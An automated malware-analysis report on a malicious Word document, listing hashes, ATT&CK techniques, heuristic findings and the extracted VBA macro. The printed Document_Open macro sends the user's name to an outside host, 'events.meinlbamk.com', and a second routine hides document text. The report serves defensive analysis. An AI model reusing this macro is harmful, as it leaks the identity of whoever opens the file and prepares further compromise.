Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 ed2a56af1ae40110…

MALICIOUS

Office (OLE)

Size: 460.5 KB
Created: 2017-07-19 09:42:00
Authoring application: Microsoft Office Word
First seen: 2019-12-09

MD5: 11cf2edb6a38f8c61ce64b3ba0a021f8
SHA-1: 538d62b3bf352d1ab6e1ec321eef7ebe26fc425a
SHA-256: ed2a56af1ae401104a73ac4a7e7f33e206b517f15c1429e226715c66c216b967

Risk score: 290

Malware Insights

MITRE ATT&CK
  • T1059.005 Visual Basic
  • T1566.001 Spearphishing Attachment
  • T1203 Exploitation for Client Execution

The sample contains VBA macros, including a Document_Open subroutine that executes shell commands. This macro attempts to download a payload from the URL 'http://events.meinlbamk.com/login.php?input=' by concatenating it with the user's name. The presence of CreateProcess, VirtualAlloc, WriteProcessMemory, and CreateRemoteThread API calls strongly suggests the execution of a secondary payload. The document body explicitly asks the user to enable macros for full viewing, a common social engineering tactic.

Heuristics (9)

  • Reference to WriteProcessMemory API [critical] (SC_STR_WRITEPROCESSMEMORY)
    Reference to WriteProcessMemory API
  • Reference to CreateRemoteThread API [critical] (SC_STR_CREATEREMOTETHREAD)
    Reference to CreateRemoteThread API
  • Reference to CreateProcess API [high] (SC_STR_CREATEPROCESS)
    Reference to CreateProcess API
  • VBA macros detected [medium] (OLE_VBA_MACROS; 3 related findings)
    Document contains VBA macro code
  • CreateObject call [high] (OLE_VBA_CREATEOBJ)
    CreateObject call
    Matched line in script
        strUrl = "http://events.meinlbamk.com/login.php?input=" & Application.UserName
        Set hReq = CreateObject("MSXML2.XMLHTTP")
            With hReq
  • VBA p-code auto-exec with execution tokens [high] (OLE_VBA_PCODE_AUTOEXEC_EXEC)
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Document_Open macro [low] (OLE_VBA_DOCOPEN)
    Document_Open macro
    Matched line in script
    Attribute VB_Customizable = True
    Private Sub Document_Open()
        'oxFlMRrmjK
  • Reference to VirtualAlloc API [medium] (SC_STR_VIRTUALALLOC)
    Reference to VirtualAlloc API
  • Embedded URL [info] (EMBEDDED_URL)
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    Extracted URLs and the channel that reached each one:
    • http://events.meinlbamk.com/login.php?input=  [In document text (OLE body)]
    • http://schemas.openxmlformats.org/drawingml/2006/main  [In document text (OLE body)]
    • http://schemas.openxmlformats.org/officeDocument/2006/bibliography  [In document text (OLE body)]
    • http://schemas.openxmlformats.org/officeDocument/2006/customXml  [In document text (OLE body)]

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 871 bytes
SHA-256: fa7feb388186d4a94bdee1eb5b3d5d4f17e1c3d1e3c53f02789cb059cf7cc3da
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_Open()
    'oxFlMRrmjK
    Dim strUrl As String
    strUrl = "http://events.meinlbamk.com/login.php?input=" & Application.UserName
    Set hReq = CreateObject("MSXML2.XMLHTTP")
        With hReq
            .Open "GET", strUrl, False
            .Send
        End With
        
    If ThisDocument.ReadOnly = False Then
        ThisDocument.Save
    End If
End Sub

Sub oxFlMRrmjK()
    Dim sZpImFWCda As Document
    Set sZpImFWCda = ActiveDocument
    Dim ivOUIYFzPz As Variant
    sZpImFWCda.Sections.First.Range.Font.Hidden = True
End Sub